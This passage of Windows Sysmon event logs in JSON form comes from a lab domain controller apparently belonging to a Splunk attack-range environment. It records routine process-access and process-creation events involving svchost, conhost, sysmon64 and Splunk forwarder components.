C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5744,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5745,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.094\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0337-5F25-0000-001038CC0A00}\r\nTargetProcessId: 2360\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.094","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0337-5F25-0000-001038CC0A00}","TargetProcessId":"2360","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5746,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.235\r\nSourceProcessGUID: {A837DB8D-0337-5F25-0000-001038CC0A00}\r\nSourceProcessId: 2360\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.235","SourceProcessGUID":"{A837DB8D-0337-5F25-0000-001038CC0A00}","SourceProcessId":"2360","SourceThreadId":"4616","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5747,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.690\r\nProcessGuid: {A837DB8D-0338-5F25-0000-0010C8CE0A00}\r\nProcessId: 3304\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.690","ProcessGuid":"{A837DB8D-0338-5F25-0000-0010C8CE0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5748,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.688\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0338-5F25-0000-0010C8CE0A00}\r\nTargetProcessId: 3304\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.688","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0338-5F25-0000-0010C8CE0A00}","TargetProcessId":"3304","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5749,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.688\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0338-5F25-0000-0010C8CE0A00}\r\nTargetProcessId: 3304\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.688","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0338-5F25-0000-0010C8CE0A00}","TargetProcessId":"3304","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5750,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.688\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.688","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5751,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.688\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.688","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
